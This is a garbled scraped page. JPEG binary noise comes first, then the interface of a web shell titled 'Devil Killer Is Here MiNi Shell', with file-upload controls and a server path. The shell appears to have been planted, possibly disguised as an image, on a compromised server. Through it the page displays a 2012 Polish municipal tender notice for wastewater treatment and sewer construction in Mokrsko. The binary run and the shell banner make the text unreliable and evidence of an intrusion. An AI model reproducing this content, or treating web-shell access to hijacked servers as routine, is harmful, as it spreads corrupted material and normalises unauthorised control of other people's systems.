JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120321/87964-N-2012.html

<p class="kh_header"><b>Mokrsko: Budowa systemu oczyszczania ścieków w gminie Mokrsko</b><br>
<b>Numer ogłoszenia: 87964 - 2012; data zamieszczenia: 21.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mokrsko , Mokrsko 231, 98-345 Mokrsko, woj. łódzkie, tel. 43 841 18 18, faks 43 886 32 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mokrsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa systemu oczyszczania ścieków w gminie Mokrsko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest wykonanie zadania:
 Budowa systemu oczyszczania ścieków w gminie Mokrsko.

3.1.1 W ramach części I przedmiotu zamówienia należy wykonać zadanie:
Budowa przydomowych oczyszczalni ścieków na terenie Gminy Mokrsko

1)	W ramach zadania przewiduje się budowę 95 szt. przydomowych oczyszczalni ścieków w miejscowościach (na wymienionych działkach):
Brzeziny - 29, 9, 10, 12,
Chotów - 445/2, 160, 122/3, 122/5, 126, 141, 134, 104/1, 104/2, 103, 445/1
Komorniki - 514, 439, 511, 444, 505,
Krzyworzeka - 210/1, 813/3, 810, 806, 805/3, 805/4, 808/3, 812/4, 97
Lipie - 263, 231, 232, 286,
Mątewki - 1/3, 37, 38, 82, 72, 17, 18, 13/4, 51, 43, 3, 4, 81
Mokrsko - 1117, 1116, 1587/1, 1125, 217/2, 33, 1124,
Motyl Żelazna - 175/1, 771, 173, 172/1, 822, 169, 168/1, 168/2, 186, 185/4
Mokrsko Kośnik dz. nr 1153
Ożarow - 253, 2780/1, 86, 701/9, 670, 671/1, 671/2, 672, 669/3, 676, 586/1, 587, 589, 590, 39, 552, 128, 603, 599,
Ożarow Kocilew - 593, 608,
Ożarow Sikornik - 867/1, 495, 496,
Ożarow Słoniny - 666, 664, 663, 631, 633,
Słupsko - 168/2, 220, 150/3, 139, 136, 130, 12, 10/1, 99, 100,
Stanisławów - 769/1, 769/2, 773/2,
2)	Zmówienie obejmuje budowę 95 szt. przydomowych oczyszczalni ścieków zgodnie z wymaganiami Dokumentacji projektowej oraz STWiOR z zastrzeżeniem iż w przypadku gdy z przyczyn nie leżących po stronie Zamawiającego w trakcie realizacji zadania ulegnie zmniejszeniu (odstąpienie od umowy właściciela posesji) ilość przydomowych oczyszczalni wynagrodzenie umowne Wykonawcy zostanie odpowiednio zmniejszone.
3)	Parametry i wymogi dla budowy oczyszczalni przydomowych.              Wymagania techniczne i parametry urządzeń określone zostały w Specyfikacji Technicznej Wykonania i Odbioru Robót. Oczyszczalnia musi posiadać wydaną, zgodną z Dyrektywą Produktów Budowlanych 89/106/EEC, deklarację zgodności CE o spełnieniu przez Urządzenie wymagań Dyrektywy Unii Europejskiej 89/106/EEC i na podstawie przeprowadzonych badań w jednostce notyfikowanej, odpowiadającą wszystkim standardom PN EN 12566-3 +A1:2009 Małe oczyszczalnie ścieków do 50 RLM. 3 część. Fabrycznie i (lub) na budowie zmontowane oczyszczalnie ścieków potwierdzona załączonym do oferty Raportem z Badań z Laboratorium Notyfikowanego. Podstawowe elementy oczyszczalni to: reaktor, zbiornik oczyszczalni, studnia chłonna, kanały doprowadzające, kanały odpływowe, drenaż, przepompownia ścieków oczyszczonych, szafka sterująca, pompy mamutowe, sprężarka, elektrozawory.
4)	Przedmiot i zakres robót budowlanych.                                                  Roboty te obejmują wszystkie czynności umożliwiające i mające na celu wykonanie dostawy i montażu przydomowych oczyszczalni ścieków z przyłączami, oraz instalacji wprowadzenia oczyszczonych ścieków do ziemi, a w szczególności:
a)	Roboty przygotowawcze w postaci urządzenia i zabezpieczenia placu budowy oraz wytyczenia geodezyjnego obiektów oczyszczalni.
b)	Dostawa i montaż zbiornika oczyszczalni 
c)	Dostawa i montaż przepompowni ścieków
d)	Dostawa i montaż elementów studni chłonnej
e)	Dostawa i montaż elementów drenażu rozsączającego,
f)	Roboty ziemne dla zbiornika oczyszczalni, przepompowni, studni chłonnej, drenażu rozsączającego, przyłączy kanalizacyjnych i przyłączy elektrycznych.
g)	Dostawa i montaż przyłączy kanalizacji i zasilania elektrycznego w tym do instalacji kanalizacyjnej i elektrycznej budynku,
h)	Rozruch techniczny i technologiczny.
i)	Wykonanie powykonawczej inwentaryzacji geodezyjnej,
j)	Wykonanie badań ścieków oczyszczonych niezwłocznie po uruchomieniu oczyszczalni -  Parametry ścieków oczyszczonych spełniać muszą co najmniej wymagania określone w § 4 ust. 1 - załącznik Nr 1 Rozporządzenia Ministra Środowiska z dnia 24 lipca 2006 r. w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz. U. Nr 137, poz. 984). W przypadku negatywnego wyniku  badania z przyczyn leżących po stronie użytkownika Wykonawca sporządzi protokół potwierdzony przez użytkownika  który stanowić będzie element dokumentacji odbiorczej dla zakresu robót objętych przedmiotem przetargu,
k)	Indywidualne przeszkolenie użytkowników- potwierdzone na piśmie,
l)	Odtworzenie terenu po wykonaniu prac do stanu przed przystąpieniem do montażu,
m)	Wywóz nadmiaru ziemi powstałego w wyniku prac,
Oczyszczalnie budowane są w trudnych warunkach glebowych - piaski gliniaste, piaski ilaste, iły, gliny, co powoduje wymianę gruntu i z jednoczesnym wysokim poziomem wód gruntowych - budowę drenażu w nasypie.



3.1.2. W ramach części II  przedmiotu zamówienia należy wykonać zadanie:
Budowa kanalizacji sanitarnej z przyłączami kanalizacyjnymi i przepompowniami ścieków zlokalizowanej na działkach w obrębach - Brzeziny, Chotów, Krzyworzeka, Mokrsko, Ożarów

Jest to część zaprojektowanej sieci kanalizacji sanitarnej pracującej w systemie grawitacyjno-tłocznym obejmującej swym zasięgiem zlewnię miejscowości Krzyworzeka, Chotów, Ożarów i Mokrsko.

Zakres inwestycji:

1)	Odcinek kanalizacji grawitacyjnej, ciśnieniowej i wykonanie tłoczni ścieków P1 przy drodze powiatowej nr 4510E Wieluń - Toplin w miejscowości Krzyworzeka
OGÓLNA DŁUGOŚĆ SIECI KANALIZACYJNEJ - 3956mb
DŁUGOŚĆ KANAŁU PVC SN8 DN200 - 2406mb
DŁUGOŚĆ KANAŁU PVC SN8 DN160 - 276mb
DŁUGOŚĆ KANAŁU PE100 SDR17 PN10 DN200 - 38mb
DŁUGOŚĆ KANAŁU PE100 SDR17 PN10 DN90 - 1236mb
PROFILE: P1-St19; S1-S37; St22-Sp1; S10-Sp2; St26-Sp3; S12-Sp4; S13-Sp5; S14-Sp6; S15-Sp7; S16-Sp8; S17-Sp9; S18-Sp10;
S19-Sp11; S20-Sp12; S21-St81; St78-Sp13; S39-S40; S40-SI1; SI1-Sp14; St81-Sp15; St1-Sp41; St4-S44; S3-St122; S7-St134; S58-
St139; St138-Sp47; St139-Sp48
P1-S1; P4-S20 - odcinek S20-C129
Tłocznia ścieków P1.
Przyłącze energetyczne do tłoczni P1.
Budowa zjazdu z drogi powiatowej do tłoczni P1.
2)	 Odcinek obejmujący wykonanie przepompowni ścieków P2 i P6 oraz zlewnie pompowni P6 i P2 oraz część zlewni pompowni P1; odcinek na południe od drogi powiatowej Wieluń - Toplin w miejscowości Krzyworzeka do studni S121 na terenie miejscowości Ożarów; odcinek pomiędzy studniami S21, a S121, z wyłączeniem zlewni pompowni P5.
OGÓLNA DŁUGOŚĆ SIECI KANALIZACYJNEJ - 5313mb
DŁUGOŚĆ KANAŁU PVC SN8 DN200 - 3867mb
DŁUGOŚĆ KANAŁU PVC SN8 DN160 - 869mb
DŁUGOŚĆ KANAŁU PE100 SDR17 DN90 - 544mb
DŁUGOŚĆ KANAŁU PE100 SDR17 DN63 - 33mb
PROFILE: S1-S37 - odcinek od istniejącej studni S21 do S37; St28-Sp16; St29-Sp17; S22-St87; St85-Sp216; S23-St88; St88-Sp18;
St35-Sp19; St37-Sp20; S26-Sp21; S26-Sp22; St42-K10; S27-Sp24; St47-Sp25; St53-S41; S41-Sp26; S31-Sp27; St58-St91; St91-Sp28;
St61-Sp29; S33-Sp30; St64-Sp31; St66-Sp32; S34-St92; St92-Sp33; St71-Sp34; St73-Sp35; S35-Sp36; S36-S43; S43-Sp37; St74-K26;
St75-Sp38; St77-Sp39; S37-Sp40; P2-St144; S61-St158; St146-Sp49; S63-Sp50; St148-Sp51; St149-Sp52; S64-Sp53; St150-Sp54;
St152-Sp55; St153-Sp56; St154-Sp57; St155-K54; St158-Sp58; S62-Sp59; St143-Sp60; St144-Sp61; P6-S111; St316-S123; St322-
Sp182; St323-Sp183; St324-Sp184; St326-Sp185; S113-Sp186; St330-Sp187; St333-Sp188; St355-Sp132; S115-K73; S115-Sp189;
St337-Sp190; St338-Sp191; St339-Sp192; St342-K74; St345-K75; S118-K76; St349-Sp193; St317-Sp195; S110-Sp196; St319-Sp197;
St320-Sp132; S111-Sp198;
P2-S35; P6-St158; Cp1-Sp31
Przepompownie ścieków P2 i P6
Przyłącza energetyczne do przepompowni P2 i P6.
3)	 Budowa 5 przyłączy kanalizacji sanitarnej w miejscowości Mokrsko: 
a)	przyłącze kanalizacji sanitarnej do budynku mieszkalnego na działce nr ewid. 1430 w m. Mokrsko 185 (DŁUGOŚĆ KANAŁU PVC SN8 DN160 - 57mb),
b)	przyłącze kanalizacji sanitarnej do budynku na dz. nr 885/5 w m. Mokrsko 67 (DŁUGOŚĆ KANAŁU PVC SN8 DN160 - 58,9mb),
c)	3 przyłącza kanalizacji sanitarnej do budynków mieszkalnych na dz. nr 1014; 1013; 1012/1, 915 w m. Mokrsko nr 130, 132, 134 (DŁUGOŚĆ KANAŁU PVC SN8 DN160 - 113,68mb).
4)	Budowane - tłocznia P1, przepompownie ścieków P1 i P2 mają być wpięte i współpracować z systemem monitoringu i wizualizacji pracującym w oparciu o pakietową transmisję danych GPRS, który jest zainstalowany i funkcjonuje w Gminie Mokrsko. Oprogramowanie nowych przepompowni ma być zintegrowane i kompatybilne z istniejącym systemem monitoringu i wizualizacji Hydro-Net, zainstalowanym na Stacji Dyspozytorskiej mieszczącej się w oczyszczalni ścieków w Mokrsku.
5)	Do Wykonawcy należy opracowanie i uzgodnienie projektu organizacji ruchu dla robót kanalizacyjnych w pasach dróg powiatowych i gminnych oraz koszty zajęcia pasów dróg.
6)	W ramach podetapu w Roku 2012 należy wykonać:
Z zakresów 3.1.2.  pkt. 1 i 2. wykonanie odcinka kolektorów grawitacyjnych i tłocznych wraz z przyłączami: St25 - Sp14; C129 - C130; C130 - S20; S20 - S21; S21 - S23; S23 - St88.

Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacjach projektowo - technicznych, przedmiarach robót  oraz w załączniku Nr  8-   Opis wyposażenia szaf sterowniczych przepompowni i tłoczni ścieków wraz z systemem monitoringu obowiązujący w gminie Mokrsko oraz Specyfikacjach Technicznych Wykonania i Odbioru Robót oraz w załączniku które stanowią załączniki do niniejszej Specyfikacji Istotnych Warunków Zamówienia,   zwanej dalej SIWZ.
Dokumenty te zamieszczone są na stronie internetowej  Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających polegających na budowie kanalizacji  sanitarnej z przyłączami kanalizacyjnymi i przepompowniami ścieków stanowiących nie więcej niż 50 % wartości zamówienia podstawowego. Ewentualne zamówienie uzupełniające zostanie udzielone w trybie przewidzianym w art. 67 ust. 1 pkt. 6 ustawy pzp, jeżeli zostaną spełnione przesłanki ustawowe.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9, 45.11.12.00-0, 45.23.24.23-3, 45.23.24.00-6, 45.23.13.00-8, 45.25.56.00-5, 45.23.24.10-9, 45.31.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Składana oferta musi być zabezpieczona wadium :

a)	Dla części I przedmiotu zamówienia w wysokości 25.000,00 zł (słownie:  dwadzieścia pięć tysięcy złotych 00/100 ).
b)	Dla części II przedmiotu zamówienia w wysokości 100.000,00 zł (słownie:  sto tysięcy złotych 00/100 ).

2)	Wadium może być wniesione w jednej lub kilku formach określonych w art. 45 p.z.p.: 
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.   Nr 109, poz. 1158 z późn. zm.).

3)	Termin wniesienia wadium upływa w dniu składania ofert. Oznacza to, że:
 
a)	wadium wniesione w formie pieniężnej przed upływem terminu składania ofert  musi znajdować się na rachunku bankowym Zamawiającego. Wadium w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego w Banku Spółdzielczym w Ruścu O/Mokrsko,  nr rachunku 49 9264 0009 0020 0006 2000 0110. Na przelewie bezgotówkowym należy umieścić informację:
Budowa systemu oczyszczania ścieków w gminie Mokrsko  
b)	W przypadku wniesienia wadium w formie niepieniężnej oryginał lub potwierdzoną za zgodność kopię przedmiotowego dokumentu należy załączyć do oferty (ale w oddzielnej kopercie, by nie było na stale związane z ofertą). Dokument ten musi być ważny w całym okresie związania ofertą - pierwszym dniem jego obowiązywania powinien być dzień otwarcia ofert. 
c)	W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich Zamawiający może zatrzymać wadium wraz z odsetkami. Okoliczności muszą zawierać sytuacje określone :
- w art. 46 ust. 4a ustawy Pzp, tj. jeżeli Wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust. 3 ustawy Pzp nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw. 
- w art. 46 ust. 5 ustawy Pzp, tj.:jeżeli Wykonawca, którego oferta została wybrana:
1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
4)	Zamawiający zwróci/ zwolni wadium w terminach i sytuacjach określonych w art. 46 p.z.p.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części I-	posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj. udokumentują wykonanie  (zakończenie a nie rozpoczęcie i zakończenie) w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednego  kontraktu na wykonanie robót budowlanych polegających na budowie przydomowych oczyszczalni ścieków w ilości co najmniej 90 sztuk oraz wartości wykonanych robót co najmniej 1.000.000,00zł BRUTTO:  
dla części II-2.	posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj. udokumentują wykonanie  (zakończenie a nie rozpoczęcie i zakończenie) w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej roboty budowlanej polegającej na budowie sieci kanalizacyjnej o wartości co najmniej 2.000.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części I-	Dysponują osobami zdolnymi do wykonania zamówienia tj. 
a) osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji: cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych;
b) osobą, która będzie pełnić funkcję kierownika robót, posiadająca uprawnienia do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie instalacji elektrycznych; 
Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.
dla części II-	Dysponują osobami zdolnymi do wykonania zamówienia tj. 
a)	osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i  instalacji: cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych;
b)	osobą, która będzie pełnić funkcję kierownika robót, posiadająca uprawnienia do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie instalacji elektrycznych; 
Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części I-	Znajdują się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie przedmiotu umowy, tj. 
a.	posiadanie środków finansowych lub zdolności kredytowej o łącznej kwocie w wysokości co najmniej 1.000.000,00 zł
b.	posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 1.000.000,00 zł 
dla II części -	Znajdują się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie przedmiotu umowy, tj. 
a)	posiadanie środków finansowych lub zdolności kredytowej o łącznej kwocie w wysokości co najmniej 2.500.000,00 zł 
b)	posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 2.500.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

